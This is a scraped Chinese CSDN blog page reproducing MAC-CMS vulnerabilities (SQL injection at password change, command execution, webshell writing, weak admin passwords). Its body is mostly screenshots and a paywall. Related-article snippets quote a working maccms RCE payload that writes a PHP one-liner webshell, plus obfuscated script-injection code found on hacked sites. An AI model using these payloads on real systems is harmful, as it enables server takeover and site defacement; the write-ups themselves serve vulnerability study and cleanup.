苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)

最新推荐文章于 2024-08-04 22:21:07 发布
最新推荐文章于 2024-08-04 22:21:07 发布
阅读量3.7k 收藏 6
点赞数 1
文章标签: 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44925883/article/details/117014868
版权
本文详细复现了MAC-CMS系统中的一系列安全漏洞,包括前台修改密码时出现的SQL注入问题,允许攻击者查看数据库和用户信息。此外,还存在命令执行漏洞,可以获取PHP信息,并尝试写入shell。同时,系统中发现弱口令问题,如'admin/admin/123456',增加了系统的安全隐患。
摘要由CSDN通过智能技术生成

前台修改密码处存在sql注入漏洞

注册账户登录后发送POST
在这里插入图片描述
查看数据库
在这里插入图片描述
查看用户
在这里插入图片描述
不过后续操作一直被拦截,暂未找到过滤方法
在这里插入图片描述

命令执行漏洞

直接获取php info信息
在这里插入图片描述
写shell
在这里插入图片描述
在这里插入图片描述

最低0.47元/天 解锁文章
信安小菜鸡
关注
漏洞复现maccms苹果cms 命令执行漏洞
失心少年
11-16 2144
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致
jun2016425的博客
10-30 9439
最近闲无事想建个站来玩玩,但是又不想于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的. 被挂马表现: 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js 苹果cms后台某处或者采集的资源打印奇怪的字符比如 {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuan.
常见的cms漏洞
最新发布
qq_68186313的博客
08-04 1388
2、点击【生成】--》【更新主页HTML】--》将主页位置修改为【.·/index.php】--》点击【生成静态】--》点击【更新主页】再次访问站点首页可发现变化。1、接着上一个环境使用,将带有后门的文件加入到主题中并将主题压缩为ZP文件点击【外观】-》【主题】--》【添加】--》【上传主题】--》【浏览】--》【现在安装】1、与WPCMS类似,直接修改模板拿WebShell..点击【模板】--》【默认模板管理】一》【index.htm】---》【修改】在文件修改中添加一句话代码如下。
苹果CMS漏洞
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 377
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
苹果maccms网站漏洞进行修复解决方法教程
weixin_46020146的博客
09-05 298
苹果maccms网站漏洞进行修复解决方法教程
2020解决苹果CMS漏洞被挂马v8 v10最新版本
网站安全专家
01-04 4798
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv...
苹果cms php获取id,苹果CMS全版本getshell打包第一弹
weixin_34517745的博客
03-19 3955
### 简要描述:苹果CMS全版本后台getshell打包苹果cms官网http://www.maccms.com/### 详细说明:漏洞一后台模板任意后缀文件[](https://images.seebug.org/upload/201402/2809474390f6d06521ddd092ec7c755cfc8375f2.jpg)chrome审查元素吧value里的.html改成.php[](...
苹果CMSV10常用sql语句
ailvezhuax的博客
03-03 1339
1.查询数据 SELECT * FROM {pre}vod 查询所有数据 SELECT * FROM {pre}vod WHERE vod_id=1000 查询指定ID数据 2.删除数据 DELETE FROM {pre}vod 删除所有数据 DELETE FROM {pre}vod WHERE vod_id=1000 删除指定的第几条数据 DELETE FROM {pre}...
傻眼!25分类227页1000+题50w+字的绝版“java高分面试指南”现世!
mf97532的博客
07-06 419
一次偶然,从朋友那里得到一份“java高分面试指南”,里面涵盖了25个分类的面试题以及详细的解析:JavaOOP、Java集合/泛型、Java中的IO与NIO、Java反射、Java序列化、Java注解、多线程&并发、JVM、Mysql、Redis、Memcached、MongoDB、Spring、Spring Boot、Spring Cloud、RabbitMQ、Dubbo 、MyBatis 、ZooKeeper 、数据结构、算法、Elasticsearch 、Kafka 、微服务、Linux。这
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
Mac8.0的一款getshell工具 直接传一句话 用菜刀连就行了
黑客必杀技能之一,彻底掌握SSTI模板注入漏洞使用方法,如何构造有效载荷?利用攻击载荷达成CTF漏洞静态打桩获取敏感信息远程执行代码,攻击案例实战包括海洋cms,74cms,ofcms
代码讲故事
12-29 1010
黑客必杀技能之一,彻底掌握SSTI模板注入漏洞使用方法,如何构造有效载荷?利用攻击载荷达成CTF漏洞静态打桩获取敏感信息远程执行代码,攻击案例实战包括海洋cms,74cms,ofcms等。 漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
网站漏洞修补之苹果cms建站系统
网站漏洞修复专家
04-22 1112
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下. maccms漏洞分析与修复 苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的...
苹果cms最新漏洞被挂马跳转劫持及清除代码
sexrenge的博客
09-03 6445
网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x
记某CMS漏洞getshell
zhangge3663的博客
05-05 2883
记极致CMS漏洞getshell 今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等。 于是就引起了我的兴趣想去测试一下。 信息收集 还是因为自己太懒,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。(不能随便乱日) 弱密码yyds 搜索了一些网站,我们直接在url后面添加/admin.php,就直接跳到后台登录的地方。 看到后台?!嗯
【安全漏洞】某CMS后台防护逻辑漏洞导致GETSHELL
01-10 186
【安全漏洞】某CMS后台防护逻辑漏洞导致GETSHELL 1.2000多本网络安全系列电子书 2.网络安全标准题库资料 3.项目源码 4.网络安全基础入门、Linux、web安全、攻防方面的视频 5.网络安全学习路线图 漏洞分析: 打开我们下载的源码 漏洞源头为“图片水印设置”功能,对应的源码文件为admin_config_mark.php 当我们后台使用图片设置功能时 点击提交之后,这里首先调用了admin_config_mark.php文件,而这个文件的开头加载了全局文件 继续跟进config
苹果CMS网站awd复现
qq_48511129的博客
01-16 4339
D盾扫描无结果 漏洞一:自带大马后门 使用方法 漏洞二:前台rce 进行rce wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A} 进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。 参考 https://blog.csdn.net/m0_37438418/artic
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值